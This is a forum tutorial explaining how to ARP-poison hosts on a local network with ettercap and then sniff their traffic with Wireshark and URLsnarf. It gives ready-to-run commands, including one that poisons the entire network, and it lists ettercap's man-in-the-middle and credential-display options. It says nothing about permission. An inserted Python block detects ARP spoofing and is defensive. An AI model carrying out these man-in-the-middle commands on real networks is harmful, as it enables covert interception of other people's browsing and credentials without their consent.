10-10-2016, 02:47 AM
Monitor Network Activity
This tutorial will demonstrate how to use ettercap, wireshark and URLsnarf to sniff and monitor network activity.
I am using Kali Linux, which comes with this software pre-installed. Backtrack also works. If you want, you can install all the software on any other Linux distro of your choice.
1) First, we need to get our computer ready to begin monitoring. Open a new terminal, start networking, and enable IP forwarding:
Code:
/etc/init.d/networking start
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
Check that forwarding is now enabled (this should print 1):
Code:
cat /proc/sys/net/ipv4/ip_forward
2) Poison the network computers. Use this command to ARP poison the computers you want to monitor:
Code:
ettercap -M arp /router_ip/ /target_ip_addresses/ -p -T -q -i wlan0
Leave the target_ip_addresses blank ("//") to poison the entire network. You can use -P pluginname to use a plugin; the autoadd plugin will add targets dynamically. We can add "-P autoadd" to the end of the above command.
When finished, use Ctrl+C to stop the running processes and unpoison the clients' ARP caches.
3) Capturing all packets using wireshark:
Open Wireshark, click start capture and select the network adapter to use. We are using wlan0.
All packets will start being displayed on your screen. You can use various filters to limit the packets you want to see. The default colour scheme is slightly terrible, so you can change it using "Coloring Rules..." in the view menu.
4) Monitoring visited URLs on the network with URLSnarf:
A great program to use if you just want to view URLs visited is URLSnarf. Open a second terminal, and use this command to display the URLs:
Code:
urlsnarf -i wlan0
To print only the URL field from each log line:
Code:
urlsnarf -i wlan0 | cut -d\" -f4
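For the defender's side of step 2, here is an added example (not from the original post, and not part of ettercap or Wireshark) of detecting the ARP-cache poisoning this procedure performs: it parses raw Ethernet/ARP reply frames and alerts when an IP address's sender MAC changes mid-capture or contradicts a known gateway binding. The MACs, IPs and frames are constructed sample data; the frame builder exists only to produce that offline input.

```python
import struct

ETH_P_ARP, ARP_REPLY = 0x0806, 2

def mac_bytes(mac): return bytes(int(x, 16) for x in mac.split(":"))
def ip_bytes(ip): return bytes(int(x) for x in ip.split("."))

def build_arp(sender_mac, sender_ip, target_mac, target_ip, oper=ARP_REPLY):
    """Raw Ethernet II + ARP frame; used here only to construct offline sample input."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, oper)  # Ethernet/IPv4, 6-byte MAC, 4-byte IP
    return eth + arp + mac_bytes(sender_mac) + ip_bytes(sender_ip) + mac_bytes(target_mac) + ip_bytes(target_ip)

def parse_arp(frame):
    """Return (sender_ip, sender_mac, opcode) for an IPv4-over-Ethernet ARP frame, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sha, spa = frame[22:28], frame[28:32]
    return ".".join(map(str, spa)), ":".join(f"{b:02x}" for b in sha), oper

def detect_arp_spoof(frames, trusted=None):
    """Alert when an IP's sender MAC changes, or a trusted IP->MAC binding (e.g. the gateway) is contradicted."""
    trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    seen, alerts = {}, []
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None or parsed[2] != ARP_REPLY:   # only replies rewrite neighbour caches
            continue
        ip, mac, _ = parsed
        if ip in trusted and mac != trusted[ip]:
            alerts.append(f"{ip} claimed by {mac}, trusted {trusted[ip]}")
        elif ip in seen and seen[ip] != mac:
            alerts.append(f"{ip} changed from {seen[ip]} to {mac}")
        seen.setdefault(ip, mac)                       # remember the first binding observed
    return alerts

# Constructed sample capture: gateway 192.168.1.1 answers from aa:...:01, then a third
# host (cc:...:03) starts answering for both the gateway and the victim .20 (a MITM pattern).
GATEWAY_MAC = "aa:aa:aa:aa:aa:01"
SAMPLE_FRAMES = [
    build_arp(GATEWAY_MAC, "192.168.1.1", "bb:bb:bb:bb:bb:02", "192.168.1.20"),
    build_arp("bb:bb:bb:bb:bb:02", "192.168.1.20", GATEWAY_MAC, "192.168.1.1"),
    build_arp("cc:cc:cc:cc:cc:03", "192.168.1.1", "bb:bb:bb:bb:bb:02", "192.168.1.20"),
    build_arp("cc:cc:cc:cc:cc:03", "192.168.1.20", GATEWAY_MAC, "192.168.1.1"),
]

if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_FRAMES, trusted={"192.168.1.1": GATEWAY_MAC}):
        print("ALERT:", alert)
```

On a live network the same logic can be fed from a pcap of ARP traffic captured with Wireshark; a static gateway entry in the trusted table is what turns a "MAC changed" warning into a definite poisoning alert.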
LIST OF ETTERCAP COMMAND LINE ARGUMENTS:
Sniffing and Attack options:
-M, --mitm <METHOD:ARGS> perform a mitm attack
-o, --only-mitm don't sniff, only perform the mitm attack
-B, --bridge <IFACE> use bridged sniff (needs 2 ifaces)
-p, --nopromisc do not put the iface in promisc mode
-u, --unoffensive do not forward packets
-r, --read <file> read data from pcapfile <file>
-f, --pcapfilter <string> set the pcap filter <string>
-R, --reversed use reversed TARGET matching
-t, --proto <proto> sniff only this proto (default is all)
User Interface Type:
-T, --text use text only GUI
-q, --quiet do not display packet contents
-s, --script <CMD> issue these commands to the GUI
-C, --curses use curses GUI
-G, --gtk use GTK+ GUI
-D, --daemon daemonize ettercap (no GUI)
Logging options:
-w, --write <file> write sniffed data to pcapfile <file>
-L, --log <logfile> log all the traffic to this <logfile>
-l, --log-info <logfile> log only passive infos to this <logfile>
-m, --log-msg <logfile> log all the messages to this <logfile>
-c, --compress use gzip compression on log files
Visualization options:
-d, --dns resolves ip addresses into hostnames
-V, --visual <format> set the visualization format
-e, --regex <regex> visualize only packets matching this regex
-E, --ext-headers print extended header for every pck
-Q, --superquiet do not display user and password
General options:
-i, --iface <iface> use this network interface
-I, --iflist show all the network interfaces
-n, --netmask <netmask> force this <netmask> on iface
-P, --plugin <plugin> launch this <plugin>
-F, --filter <file> load the filter <file> (content filter)
-z, --silent do not perform the initial ARP scan
-j, --load-hosts <file> load the hosts list from <file>
-k, --save-hosts <file> save the hosts list to <file>
-W, --wep-key <wkey> use this wep key to decrypt wifi packets
-a, --config <config> use the alterative config file <config>
Standard options:
-U, --update updates the databases from ettercap website
-v, --version prints the version and exit
-h, --help this help screen
Thanks for reading, please reply with your thanks if you enjoyed this and/or found it useful.